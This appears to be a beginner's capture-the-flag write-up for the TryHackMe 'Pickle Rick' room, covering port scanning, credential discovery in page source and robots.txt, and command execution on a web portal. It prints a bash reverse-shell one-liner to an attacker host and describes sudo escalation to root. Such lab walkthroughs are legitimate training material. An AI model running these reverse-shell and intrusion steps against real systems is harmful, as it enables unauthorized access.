Hello Everyone,this is my first write up on hacklido. Hope you will like it
Machine name : Pickle Rick
Disclaimer - My IP Address will be different from yours
Ignore the ip in my posts ,they will be diff since I had to reboot the machine more than once
Link to the room: https://tryhackme.com/room/picklerick
Start up the machine and connect yourself to the THM network by openvpn or you can use the Attackbox too. Whenever you will be on a CTF or trying to solve a machine the most important phase is gathering more and more information about your target ie Reconnaissance.
So we are going to do the same,
Scanning & Enumeration
A good rule of thumb is to start by scanning your machine for any open ports.
nmap -A -sV -sC <ip>
-sC: Scan with default NSE scripts. Considered useful for discovery and safe
-sV: Attempts to determine the version of the service running on port
-A: do an aggresive scan on these port
Port 22- ssh
Here we are able to see that our SSH port is open. This port isn’t too vulnerable unless we have found someones credentials. Se we will not mess with it.
Port 80- http
It is here were we find a web service. Lets poke around and see if there is anything interesting.
As it is running a web app,let’s use Nikto to find if we get something.
Command: nikto -h <ip>
Nothing interesting hmm ,okay let’s move on
Let’s check the source code of the web page and see if we get something ,cuz in a CTF ,something is there in general in page-source
So we get a username here : R1ckRul3s
Finding Hidden directories
We will first look if robots.txt is there ,and if there ,what’s in it .
Wow ,we got something that’s more look like a password Wubbalubbadubdub
So now we will be using dirbuster to find hidden directories ,so fire it up
So we can see there is a login.php ,and there’s something called assets ,which looks lucrative .Let’s see
Go to http://10.10.221.38/login.php
So there’s a login panel .We already have an username from the page source of main page and we also have something from robots.txt which looks like a password. Let’s see whether those work or not.
Perfect !! It worked. We are able to get logged in and we are brought to the command portal.
This kinda portal seems quite familiar to us ,let’s see if we can execute system commands on it.
Great stuffs ,so there is a Command execution vulnerability ,and now I wonder if we can access the Sup3rS3cretPickl3Ingred.txt the same way we did our robots.txt file. So in my browser I just went to the following page http://<ipAddress>/Sup3rS3cretPickl3Ingred.txt and what do you know we now have the content of that text file.
One down two to go!
We have now one ingredient. It is time to find the other two but where do we start looking? We have seen there is a clue.txt . let’s see it in browser too,
Look around the file system for the other ingredient.
So we get the above hint from clue ,now let’s go back to the command portal and try to exploit the Command execution vulnerability there
Let’s open a listener port at our machine;
We will use netcat for it
Command: nc -lvnp 53
After a lot of trial and error with python reverse shells not understanding why that didn’t work I looked up at an other write up and found that you could do a bash reverse shell and after running it encapsulated in a bash -c ''. I had a reverse shell:
bash -c ‘bash -i >& /dev/tcp/<ur ip>/<port> 0>&1’
So we get a reverse shell back in our terminal ,
No let’s look for the second flag ,
So ,we get the second flag ,and now we need another and that’s the last flag ,let’s check the root folder
OOPS! It seems we don’t have permission to access it .
With the prior experience that the user can run sudo commands without password , I get my hand on the last flag.
Yo boi! we get the third one ,and we successfully completed the room.
So I hope this writeup will help you ,and if I have done some mistakes ,then let me know that in comments 🙂